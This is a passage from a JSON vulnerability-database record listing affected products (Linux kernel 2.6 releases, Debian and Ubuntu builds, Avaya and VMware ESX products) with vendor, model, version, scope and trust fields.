        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "esx server esx410-201101201",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pardus",
        "version": "20090"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "hat enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
